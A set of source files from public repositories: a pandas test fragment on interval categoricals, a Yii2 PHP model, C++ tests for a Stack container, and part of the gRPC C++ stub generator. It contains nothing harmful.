        df = DataFrame({"A": range(10)})
        s = cut(df.A, 5)
        assert isinstance(s.cat.categories, IntervalIndex)
        # B & D end up as Categoricals
        # the remainder are converted to in-line objects
        # containing an IntervalIndex.values
        df["B"] = s
        df["C"] = np.array(s)
        df["D"] = s.values
        df["E"] = np.array(s.values)
        assert is_categorical_dtype(df["B"].dtype)
        assert is_interval_dtype(df["B"].cat.categories)
        assert is_categorical_dtype(df["D"].dtype)
        assert is_interval_dtype(df["D"].cat.categories)
        assert is_object_dtype(df["C"])
        assert is_object_dtype(df["E"])
        # they compare equal as Index
        # when converted to numpy objects
        c = lambda x: Index(np.array(x))
        tm.assert_index_equal(c(df.B), c(df.B), check_names=False)
        tm.assert_index_equal(c(df.B), c(df.C), check_names=False)
        tm.assert_index_equal(c(df.B), c(df.D), check_names=False)
        tm.assert_index_equal(c(df.B), c(df.D), check_names=False)
        # B & D are the same Series
        tm.assert_series_equal(df["B"], df["B"], check_names=False)
        tm.assert_series_equal(df["B"], df["D"], check_names=False)
        # C & E are the same Series
        tm.assert_series_equal(df["C"], df["C"], check_names=False)
        tm.assert_series_equal(df["C"], df["E"], check_names=False)
def test_set_reset_index(self):
df = DataFrame({"A": range(10)})
s = cut(df.A, 5)
df["B"] = s
df = df.set_index("B")
df = df.reset_index()
| TomAugspurger/pandas | pandas/tests/frame/test_alter_axes.py | Python | bsd-3-clause | 8,801 |
<?php
namespace app\models;
use Yii;
/**
 * ActiveRecord model for the {{%measure}} table.
 *
 * A measure is a single cell value identified by (cnum, date, row, col).
 */
class Measure extends \yii\db\ActiveRecord {
    /**
     * @inheritdoc
     * @return string the associated database table name
     */
    public static function tableName() {
        return '{{%measure}}';
    }
    /**
     * Returns the value of a single cell, or '' when no record exists.
     *
     * (The historical method name "getColum" is kept for callers.)
     *
     * @param mixed $cnum company number the record belongs to
     * @param string $date date key of the record
     * @param int $row row index
     * @param int $col column index
     * @return string cell value, empty string when absent
     */
    public function getColum($cnum, $date, $row, $col) {
        $obj = self::find()->where([
            'cnum' => $cnum,
            'date' => $date,
            'row' => $row,
            'col' => $col,
        ])->select(['val'])->one();
        return $obj ? $obj->val : '';
    }
    /**
     * Returns all cell values of the current user's company for one date,
     * indexed as $data[row][col] => val.
     *
     * @param string $date date key of the records
     * @return array two-dimensional map of values (empty when none found)
     */
    public function getMonth($date) {
        // Consistency fix: use the imported class name "Yii" (was "YII";
        // PHP class names are case-insensitive, so behavior is unchanged).
        $cnum = Yii::$app->user->identity->cnum;
        $records = self::find()->where([
            'cnum' => $cnum,
            'date' => $date,
        ])->select(['val', 'row', 'col'])->all();
        $data = [];
        // all() returns an array, so no null guard is needed before iterating.
        foreach ($records as $record) {
            $data[$record->row][$record->col] = $record->val;
        }
        return $data;
    }
}
| realphp/yii2-admin | models/Measure.php | PHP | bsd-3-clause | 946 |
#include "gtest/gtest.h"
#include "C3_Stack.hh"
// Construction must record the requested dimensions exactly.
TEST( StackTest, Construct )
{
    C3::size_type nframes = 2;
    C3::size_type ncolumns = 3;
    C3::size_type nrows = 4;
    C3::Stack< int > container( nframes, ncolumns, nrows );
    EXPECT_EQ( nframes , container.nframes() );
    EXPECT_EQ( ncolumns, container.ncolumns() );
    EXPECT_EQ( nrows , container.nrows() );
}
// The fill-value constructor must set every pixel to the given value.
TEST( StackTest, ConstructWithInitialization )
{
    C3::size_type nframes = 2;
    C3::size_type ncolumns = 3;
    C3::size_type nrows = 4;
    C3::Stack< int > container( nframes, ncolumns, nrows, 37 );
    EXPECT_EQ( nframes , container.nframes() );
    EXPECT_EQ( ncolumns, container.ncolumns() );
    EXPECT_EQ( nrows , container.nrows() );
    for( auto pixel : container ) EXPECT_EQ( 37, pixel );
}
// operator()(frame, column, row) and iteration must agree: writing in
// frame-fastest order and iterating must visit pixels in the same order,
// both ways round (write via operator(), read via iterator, and vice versa).
TEST( StackTest, AccessByCoordinates )
{
    C3::size_type nframes = 2;
    C3::size_type ncolumns = 3;
    C3::size_type nrows = 4;
    C3::Stack< int > container( nframes, ncolumns, nrows );
    auto pos = 0;
    for( auto k = 0; k < nrows; ++k )
    {
        for( auto j = 0; j < ncolumns; ++j )
        {
            for( auto i = 0; i < nframes; ++i ) container( i, j, k ) = pos++;
        }
    }
    pos = 0;
    for( auto pixel : container ) EXPECT_EQ( pos++, pixel );
    pos = 531;
    for( auto& pixel : container ) pixel = pos++;
    pos = 531;
    for( auto k = 0; k < nrows; ++k )
    {
        for( auto j = 0; j < ncolumns; ++j )
        {
            for( auto i = 0; i < nframes; ++i ) EXPECT_EQ( pos++, container( i, j, k ) );
        }
    }
}
// Scalar assignment must broadcast the value to every pixel.
TEST( StackTest, AssignPixel )
{
    C3::size_type nframes = 2;
    C3::size_type ncolumns = 3;
    C3::size_type nrows = 4;
    C3::Stack< int > container( nframes, ncolumns, nrows );
    auto const number = 312211;
    container = number;
    for( auto pixel : container ) EXPECT_EQ( number, pixel );
}
// Converting Stack<double> to Stack<int> must truncate each pixel
// individually while preserving its (frame, column, row) position.
TEST( StackTest, ConvertValueType )
{
    C3::size_type nframes = 2;
    C3::size_type ncolumns = 2;
    C3::size_type nrows = 3;
    C3::Stack< double > container( nframes, ncolumns, nrows );
    container( 0, 0, 0 ) = 1.1;
    container( 1, 0, 0 ) = 11.2;
    container( 0, 1, 0 ) = 21.3;
    container( 1, 1, 0 ) = 1211.4;
    container( 0, 0, 1 ) = 111221.5;
    container( 1, 0, 1 ) = 312211.5;
    container( 0, 1, 1 ) = 21.1;
    container( 1, 1, 1 ) = 211.2;
    container( 0, 0, 2 ) = 221.3;
    container( 1, 0, 2 ) = 21211.4;
    container( 0, 1, 2 ) = 2111221.5;
    container( 1, 1, 2 ) = 2312211.5;
    auto other = C3::Stack< int >( container );
    EXPECT_EQ( 1 , other( 0, 0, 0 ) );
    EXPECT_EQ( 11 , other( 1, 0, 0 ) );
    EXPECT_EQ( 21 , other( 0, 1, 0 ) );
    EXPECT_EQ( 1211 , other( 1, 1, 0 ) );
    EXPECT_EQ( 111221 , other( 0, 0, 1 ) );
    EXPECT_EQ( 312211 , other( 1, 0, 1 ) );
    EXPECT_EQ( 21 , other( 0, 1, 1 ) );
    EXPECT_EQ( 211 , other( 1, 1, 1 ) );
    EXPECT_EQ( 221 , other( 0, 0, 2 ) );
    EXPECT_EQ( 21211 , other( 1, 0, 2 ) );
    EXPECT_EQ( 2111221, other( 0, 1, 2 ) );
    EXPECT_EQ( 2312211, other( 1, 1, 2 ) );
}
| rcthomas/C3 | testing/013-stack-test.cc | C++ | bsd-3-clause | 3,107 |
/*
*
* Copyright 2015, Google Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include <string>
#include <map>
#include "src/compiler/cpp_generator.h"
#include "src/compiler/cpp_generator_helpers.h"
#include <google/protobuf/descriptor.h>
#include <google/protobuf/descriptor.pb.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/io/zero_copy_stream_impl_lite.h>
#include <sstream>
namespace grpc_cpp_generator {
namespace {
// Converts any ostream-printable value to its string form via a string
// stream (pre-C++11 substitute for std::to_string).
template <class T>
std::string as_string(T x) {
  std::ostringstream oss;
  oss << x;
  return oss.str();
}
// A plain unary RPC: neither side streams.
bool NoStreaming(const google::protobuf::MethodDescriptor *method) {
  return !(method->client_streaming() || method->server_streaming());
}
// Client streams requests; server sends a single response.
bool ClientOnlyStreaming(const google::protobuf::MethodDescriptor *method) {
  return method->client_streaming() && !method->server_streaming();
}
// Client sends a single request; server streams responses.
bool ServerOnlyStreaming(const google::protobuf::MethodDescriptor *method) {
  return method->server_streaming() && !method->client_streaming();
}
// Both directions stream.
bool BidiStreaming(const google::protobuf::MethodDescriptor *method) {
  return method->server_streaming() && method->client_streaming();
}
// Shared scan used by the Has*() queries below: true iff any method of
// any service in |file| satisfies |pred|.  Replaces four identical
// copies of the same double loop.
static bool AnyMethodMatches(
    const google::protobuf::FileDescriptor *file,
    bool (*pred)(const google::protobuf::MethodDescriptor *)) {
  for (int i = 0; i < file->service_count(); i++) {
    for (int j = 0; j < file->service(i)->method_count(); j++) {
      if (pred(file->service(i)->method(j))) {
        return true;
      }
    }
  }
  return false;
}
// True iff the file declares at least one plain unary RPC.
bool HasUnaryCalls(const google::protobuf::FileDescriptor *file) {
  return AnyMethodMatches(file, NoStreaming);
}
// True iff the file declares at least one client-streaming RPC.
bool HasClientOnlyStreaming(const google::protobuf::FileDescriptor *file) {
  return AnyMethodMatches(file, ClientOnlyStreaming);
}
// True iff the file declares at least one server-streaming RPC.
bool HasServerOnlyStreaming(const google::protobuf::FileDescriptor *file) {
  return AnyMethodMatches(file, ServerOnlyStreaming);
}
// True iff the file declares at least one bidirectional-streaming RPC.
bool HasBidiStreaming(const google::protobuf::FileDescriptor *file) {
  return AnyMethodMatches(file, BidiStreaming);
}
} // namespace
// Builds the #include / forward-declaration preamble for the generated
// header.  Always pulls in the stub, service-type and status headers,
// then forward-declares only the grpc template classes that the file's
// RPC shapes actually use, so generated headers stay lightweight.
std::string GetHeaderIncludes(const google::protobuf::FileDescriptor *file) {
  std::string temp =
      "#include <grpc++/impl/internal_stub.h>\n"
      "#include <grpc++/impl/service_type.h>\n"
      "#include <grpc++/status.h>\n"
      "\n"
      "namespace grpc {\n"
      "class CompletionQueue;\n"
      "class ChannelInterface;\n"
      "class RpcService;\n"
      "class ServerContext;\n";
  // One reader/writer pair per streaming arity, sync and async variants.
  if (HasUnaryCalls(file)) {
    temp.append(
        "template <class OutMessage> class ClientAsyncResponseReader;\n");
    temp.append(
        "template <class OutMessage> class ServerAsyncResponseWriter;\n");
  }
  if (HasClientOnlyStreaming(file)) {
    temp.append("template <class OutMessage> class ClientWriter;\n");
    temp.append("template <class InMessage> class ServerReader;\n");
    temp.append("template <class OutMessage> class ClientAsyncWriter;\n");
    temp.append("template <class OutMessage, class InMessage> class ServerAsyncReader;\n");
  }
  if (HasServerOnlyStreaming(file)) {
    temp.append("template <class InMessage> class ClientReader;\n");
    temp.append("template <class OutMessage> class ServerWriter;\n");
    temp.append("template <class OutMessage> class ClientAsyncReader;\n");
    temp.append("template <class InMessage> class ServerAsyncWriter;\n");
  }
  if (HasBidiStreaming(file)) {
    temp.append(
        "template <class OutMessage, class InMessage>\n"
        "class ClientReaderWriter;\n");
    temp.append(
        "template <class OutMessage, class InMessage>\n"
        "class ServerReaderWriter;\n");
    temp.append(
        "template <class OutMessage, class InMessage>\n"
        "class ClientAsyncReaderWriter;\n");
    temp.append(
        "template <class OutMessage, class InMessage>\n"
        "class ServerAsyncReaderWriter;\n");
  }
  temp.append("} // namespace grpc\n");
  return temp;
}
// Returns the fixed set of #include lines emitted at the top of every
// generated .cc file.  The text never varies, so it is held in a single
// constant rather than rebuilt per call.
std::string GetSourceIncludes() {
  static const char *const kSourceIncludes =
      "#include <grpc++/async_unary_call.h>\n"
      "#include <grpc++/channel_interface.h>\n"
      "#include <grpc++/impl/client_unary_call.h>\n"
      "#include <grpc++/impl/rpc_method.h>\n"
      "#include <grpc++/impl/rpc_service_method.h>\n"
      "#include <grpc++/impl/service_type.h>\n"
      "#include <grpc++/stream.h>\n";
  return kSourceIncludes;
}
// Emits the Stub (client-side) declarations for one RPC method into the
// generated header: a synchronous call plus its asynchronous variant,
// with the signature shape chosen from the method's streaming arity.
void PrintHeaderClientMethod(google::protobuf::io::Printer *printer,
                             const google::protobuf::MethodDescriptor *method,
                             std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  if (NoStreaming(method)) {
    // Unary: blocking call + async response reader.
    printer->Print(*vars,
                   "::grpc::Status $Method$(::grpc::ClientContext* context, "
                   "const $Request$& request, $Response$* response);\n");
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientAsyncResponseReader< $Response$>> "
        "$Method$(::grpc::ClientContext* context, "
        "const $Request$& request, "
        "::grpc::CompletionQueue* cq, void* tag);\n");
  } else if (ClientOnlyStreaming(method)) {
    // Client streaming: the caller writes requests through the returned writer.
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientWriter< $Request$>> $Method$("
        "::grpc::ClientContext* context, $Response$* response);\n");
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientAsyncWriter< $Request$>> $Method$("
        "::grpc::ClientContext* context, $Response$* response, "
        "::grpc::CompletionQueue* cq, void* tag);\n");
  } else if (ServerOnlyStreaming(method)) {
    // Server streaming: the caller reads responses through the returned reader.
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientReader< $Response$>> $Method$("
        "::grpc::ClientContext* context, const $Request$& request);\n");
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientAsyncReader< $Response$>> $Method$("
        "::grpc::ClientContext* context, const $Request$& request, "
        "::grpc::CompletionQueue* cq, void* tag);\n");
  } else if (BidiStreaming(method)) {
    // Bidirectional: a combined reader/writer object.
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientReaderWriter< $Request$, $Response$>> "
        "$Method$(::grpc::ClientContext* context);\n");
    printer->Print(*vars,
                   "std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
                   "$Request$, $Response$>> "
                   "$Method$(::grpc::ClientContext* context, "
                   "::grpc::CompletionQueue* cq, void* tag);\n");
  }
}
// Emits the synchronous server-side virtual method declaration for one
// RPC into the generated header (the user overrides it in a subclass).
void PrintHeaderServerMethodSync(
    google::protobuf::io::Printer *printer,
    const google::protobuf::MethodDescriptor *method,
    std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  if (NoStreaming(method)) {
    printer->Print(*vars,
                   "virtual ::grpc::Status $Method$("
                   "::grpc::ServerContext* context, const $Request$* request, "
                   "$Response$* response);\n");
  } else if (ClientOnlyStreaming(method)) {
    printer->Print(*vars,
                   "virtual ::grpc::Status $Method$("
                   "::grpc::ServerContext* context, "
                   "::grpc::ServerReader< $Request$>* reader, "
                   "$Response$* response);\n");
  } else if (ServerOnlyStreaming(method)) {
    printer->Print(*vars,
                   "virtual ::grpc::Status $Method$("
                   "::grpc::ServerContext* context, const $Request$* request, "
                   "::grpc::ServerWriter< $Response$>* writer);\n");
  } else if (BidiStreaming(method)) {
    printer->Print(
        *vars,
        "virtual ::grpc::Status $Method$("
        "::grpc::ServerContext* context, "
        "::grpc::ServerReaderWriter< $Response$, $Request$>* stream);"
        "\n");
  }
}
// Emits the asynchronous server-side Request$Method$ declaration for one
// RPC into the generated header; these enqueue a request for the method
// on a completion queue rather than handling it inline.
void PrintHeaderServerMethodAsync(
    google::protobuf::io::Printer *printer,
    const google::protobuf::MethodDescriptor *method,
    std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  if (NoStreaming(method)) {
    printer->Print(*vars,
                   "void Request$Method$("
                   "::grpc::ServerContext* context, $Request$* request, "
                   "::grpc::ServerAsyncResponseWriter< $Response$>* response, "
                   "::grpc::CompletionQueue* cq, void *tag);\n");
  } else if (ClientOnlyStreaming(method)) {
    printer->Print(*vars,
                   "void Request$Method$("
                   "::grpc::ServerContext* context, "
                   "::grpc::ServerAsyncReader< $Response$, $Request$>* reader, "
                   "::grpc::CompletionQueue* cq, void *tag);\n");
  } else if (ServerOnlyStreaming(method)) {
    printer->Print(*vars,
                   "void Request$Method$("
                   "::grpc::ServerContext* context, $Request$* request, "
                   "::grpc::ServerAsyncWriter< $Response$>* writer, "
                   "::grpc::CompletionQueue* cq, void *tag);\n");
  } else if (BidiStreaming(method)) {
    printer->Print(
        *vars,
        "void Request$Method$("
        "::grpc::ServerContext* context, "
        "::grpc::ServerAsyncReaderWriter< $Response$, $Request$>* stream, "
        "::grpc::CompletionQueue* cq, void *tag);\n");
  }
}
// Emits the full header-side declaration of one service: an outer
// $Service$ wrapper class containing the client Stub, the synchronous
// Service base class, and the asynchronous AsyncService class.
void PrintHeaderService(google::protobuf::io::Printer *printer,
                        const google::protobuf::ServiceDescriptor *service,
                        std::map<std::string, std::string> *vars) {
  (*vars)["Service"] = service->name();
  printer->Print(*vars,
                 "class $Service$ GRPC_FINAL {\n"
                 " public:\n");
  printer->Indent();
  // Client side
  printer->Print(
      "class Stub GRPC_FINAL : public ::grpc::InternalStub {\n"
      " public:\n");
  printer->Indent();
  for (int i = 0; i < service->method_count(); ++i) {
    PrintHeaderClientMethod(printer, service->method(i), vars);
  }
  printer->Outdent();
  printer->Print("};\n");
  // Factory that binds a Stub to a channel.
  printer->Print(
      "static std::unique_ptr<Stub> NewStub(const std::shared_ptr< "
      "::grpc::ChannelInterface>& "
      "channel);\n");
  printer->Print("\n");
  // Server side - Synchronous
  printer->Print(
      "class Service : public ::grpc::SynchronousService {\n"
      " public:\n");
  printer->Indent();
  printer->Print("Service() : service_(nullptr) {}\n");
  printer->Print("virtual ~Service();\n");
  for (int i = 0; i < service->method_count(); ++i) {
    PrintHeaderServerMethodSync(printer, service->method(i), vars);
  }
  // Lazily-built dispatch table; see the generated service() definition.
  printer->Print("::grpc::RpcService* service() GRPC_OVERRIDE GRPC_FINAL;\n");
  printer->Outdent();
  printer->Print(
      " private:\n"
      "  ::grpc::RpcService* service_;\n");
  printer->Print("};\n");
  // Server side - Asynchronous
  printer->Print(
      "class AsyncService GRPC_FINAL : public ::grpc::AsynchronousService {\n"
      " public:\n");
  printer->Indent();
  (*vars)["MethodCount"] = as_string(service->method_count());
  printer->Print("explicit AsyncService(::grpc::CompletionQueue* cq);\n");
  printer->Print("~AsyncService() {};\n");
  for (int i = 0; i < service->method_count(); ++i) {
    PrintHeaderServerMethodAsync(printer, service->method(i), vars);
  }
  printer->Outdent();
  printer->Print("};\n");
  printer->Outdent();
  printer->Print("};\n");
}
// Renders the header-file text for every service declared in |file|.
// Each service is printed by PrintHeaderService() into an in-memory
// buffer, separated by a blank line, and the accumulated text returned.
std::string GetHeaderServices(const google::protobuf::FileDescriptor *file) {
  std::string generated;
  google::protobuf::io::StringOutputStream out(&generated);
  google::protobuf::io::Printer printer(&out, '$');
  std::map<std::string, std::string> vars;
  const int num_services = file->service_count();
  for (int idx = 0; idx < num_services; ++idx) {
    PrintHeaderService(&printer, file->service(idx), &vars);
    printer.Print("\n");
  }
  return generated;
}
// Emits the Stub (client-side) method definitions for one RPC into the
// generated .cc file: the synchronous entry point and its async variant,
// each dispatching through the $Service$_method_names table entry $Idx$
// (set by the caller, PrintSourceService).
void PrintSourceClientMethod(google::protobuf::io::Printer *printer,
                             const google::protobuf::MethodDescriptor *method,
                             std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  if (NoStreaming(method)) {
    // Unary: delegate straight to BlockingUnaryCall / async response reader.
    printer->Print(*vars,
                   "::grpc::Status $Service$::Stub::$Method$("
                   "::grpc::ClientContext* context, "
                   "const $Request$& request, $Response$* response) {\n");
    printer->Print(*vars,
                   "  return ::grpc::BlockingUnaryCall(channel(),"
                   "::grpc::RpcMethod($Service$_method_names[$Idx$]), "
                   "context, request, response);\n"
                   "}\n\n");
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientAsyncResponseReader< $Response$>> "
        "$Service$::Stub::$Method$(::grpc::ClientContext* context, "
        "const $Request$& request, "
        "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< "
                   "::grpc::ClientAsyncResponseReader< $Response$>>(new "
                   "::grpc::ClientAsyncResponseReader< $Response$>("
                   "channel(), cq, "
                   "::grpc::RpcMethod($Service$_method_names[$Idx$]), "
                   "context, request, tag));\n"
                   "}\n\n");
  } else if (ClientOnlyStreaming(method)) {
    // Client streaming: construct a ClientWriter / ClientAsyncWriter
    // tagged with RpcType::CLIENT_STREAMING.
    printer->Print(*vars,
                   "std::unique_ptr< ::grpc::ClientWriter< $Request$>> "
                   "$Service$::Stub::$Method$("
                   "::grpc::ClientContext* context, $Response$* response) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientWriter< "
                   "$Request$>>(new ::grpc::ClientWriter< $Request$>("
                   "channel(),"
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::CLIENT_STREAMING), "
                   "context, response));\n"
                   "}\n\n");
    printer->Print(*vars,
                   "std::unique_ptr< ::grpc::ClientAsyncWriter< $Request$>> "
                   "$Service$::Stub::$Method$("
                   "::grpc::ClientContext* context, $Response$* response, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientAsyncWriter< "
                   "$Request$>>(new ::grpc::ClientAsyncWriter< $Request$>("
                   "channel(), cq, "
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::CLIENT_STREAMING), "
                   "context, response, tag));\n"
                   "}\n\n");
  } else if (ServerOnlyStreaming(method)) {
    // Server streaming: construct a ClientReader / ClientAsyncReader
    // tagged with RpcType::SERVER_STREAMING.
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientReader< $Response$>> "
        "$Service$::Stub::$Method$("
        "::grpc::ClientContext* context, const $Request$& request) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientReader< "
                   "$Response$>>(new ::grpc::ClientReader< $Response$>("
                   "channel(),"
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::SERVER_STREAMING), "
                   "context, request));\n"
                   "}\n\n");
    printer->Print(*vars,
                   "std::unique_ptr< ::grpc::ClientAsyncReader< $Response$>> "
                   "$Service$::Stub::$Method$("
                   "::grpc::ClientContext* context, const $Request$& request, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientAsyncReader< "
                   "$Response$>>(new ::grpc::ClientAsyncReader< $Response$>("
                   "channel(), cq, "
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::SERVER_STREAMING), "
                   "context, request, tag));\n"
                   "}\n\n");
  } else if (BidiStreaming(method)) {
    // Bidirectional: construct a ClientReaderWriter /
    // ClientAsyncReaderWriter tagged with RpcType::BIDI_STREAMING.
    printer->Print(
        *vars,
        "std::unique_ptr< ::grpc::ClientReaderWriter< $Request$, $Response$>> "
        "$Service$::Stub::$Method$(::grpc::ClientContext* context) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientReaderWriter< "
                   "$Request$, $Response$>>(new ::grpc::ClientReaderWriter< "
                   "$Request$, $Response$>("
                   "channel(),"
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::BIDI_STREAMING), "
                   "context));\n"
                   "}\n\n");
    printer->Print(*vars,
                   "std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
                   "$Request$, $Response$>> "
                   "$Service$::Stub::$Method$(::grpc::ClientContext* context, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(*vars,
                   "  return std::unique_ptr< ::grpc::ClientAsyncReaderWriter< "
                   "$Request$, $Response$>>(new "
                   "::grpc::ClientAsyncReaderWriter< $Request$, $Response$>("
                   "channel(), cq, "
                   "::grpc::RpcMethod($Service$_method_names[$Idx$], "
                   "::grpc::RpcMethod::RpcType::BIDI_STREAMING), "
                   "context, tag));\n"
                   "}\n\n");
  }
}
// Emits the default synchronous server implementation for one RPC into
// the generated .cc file: a stub that returns UNIMPLEMENTED until the
// user overrides the virtual method.  Only the signature differs per
// streaming arity; the four branches cover every client/server
// streaming combination, and the UNIMPLEMENTED body — previously
// duplicated in each branch — is emitted once after the signature.
void PrintSourceServerMethod(google::protobuf::io::Printer *printer,
                             const google::protobuf::MethodDescriptor *method,
                             std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  // Signature depends on the method's streaming kind.
  if (NoStreaming(method)) {
    printer->Print(*vars,
                   "::grpc::Status $Service$::Service::$Method$("
                   "::grpc::ServerContext* context, "
                   "const $Request$* request, $Response$* response) {\n");
  } else if (ClientOnlyStreaming(method)) {
    printer->Print(*vars,
                   "::grpc::Status $Service$::Service::$Method$("
                   "::grpc::ServerContext* context, "
                   "::grpc::ServerReader< $Request$>* reader, "
                   "$Response$* response) {\n");
  } else if (ServerOnlyStreaming(method)) {
    printer->Print(*vars,
                   "::grpc::Status $Service$::Service::$Method$("
                   "::grpc::ServerContext* context, "
                   "const $Request$* request, "
                   "::grpc::ServerWriter< $Response$>* writer) {\n");
  } else if (BidiStreaming(method)) {
    printer->Print(*vars,
                   "::grpc::Status $Service$::Service::$Method$("
                   "::grpc::ServerContext* context, "
                   "::grpc::ServerReaderWriter< $Response$, $Request$>* "
                   "stream) {\n");
  }
  // All variants share the same default body.
  printer->Print(
      "  return ::grpc::Status("
      "::grpc::StatusCode::UNIMPLEMENTED);\n");
  printer->Print("}\n\n");
}
// Emits the AsyncService::Request$Method$ definition for one RPC into
// the generated .cc file; each simply forwards to the matching
// AsynchronousService::Request* helper with its method-table index $Idx$
// (set by the caller, PrintSourceService).
void PrintSourceServerAsyncMethod(
    google::protobuf::io::Printer *printer,
    const google::protobuf::MethodDescriptor *method,
    std::map<std::string, std::string> *vars) {
  // Template variables substituted into the $...$ placeholders below.
  (*vars)["Method"] = method->name();
  (*vars)["Request"] =
      grpc_cpp_generator::ClassName(method->input_type(), true);
  (*vars)["Response"] =
      grpc_cpp_generator::ClassName(method->output_type(), true);
  if (NoStreaming(method)) {
    printer->Print(*vars,
                   "void $Service$::AsyncService::Request$Method$("
                   "::grpc::ServerContext* context, "
                   "$Request$* request, "
                   "::grpc::ServerAsyncResponseWriter< $Response$>* response, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(
        *vars,
        "  AsynchronousService::RequestAsyncUnary($Idx$, context, request, response, cq, tag);\n");
    printer->Print("}\n\n");
  } else if (ClientOnlyStreaming(method)) {
    printer->Print(*vars,
                   "void $Service$::AsyncService::Request$Method$("
                   "::grpc::ServerContext* context, "
                   "::grpc::ServerAsyncReader< $Response$, $Request$>* reader, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(
        *vars,
        "  AsynchronousService::RequestClientStreaming($Idx$, context, reader, cq, tag);\n");
    printer->Print("}\n\n");
  } else if (ServerOnlyStreaming(method)) {
    printer->Print(*vars,
                   "void $Service$::AsyncService::Request$Method$("
                   "::grpc::ServerContext* context, "
                   "$Request$* request, "
                   "::grpc::ServerAsyncWriter< $Response$>* writer, "
                   "::grpc::CompletionQueue* cq, void* tag) {\n");
    printer->Print(
        *vars,
        "  AsynchronousService::RequestServerStreaming($Idx$, context, request, writer, cq, tag);\n");
    printer->Print("}\n\n");
  } else if (BidiStreaming(method)) {
    printer->Print(
        *vars,
        "void $Service$::AsyncService::Request$Method$("
        "::grpc::ServerContext* context, "
        "::grpc::ServerAsyncReaderWriter< $Response$, $Request$>* stream, "
        "::grpc::CompletionQueue* cq, void *tag) {\n");
    printer->Print(
        *vars,
        "  AsynchronousService::RequestBidiStreaming($Idx$, context, stream, cq, tag);\n");
    printer->Print("}\n\n");
  }
}
// Emits all .cc-side definitions for one service: the method-name
// table, the Stub factory, every Stub method, the AsyncService
// constructor, the sync Service destructor and default methods, and
// finally the lazily-built service() dispatch table that registers a
// typed handler per method.
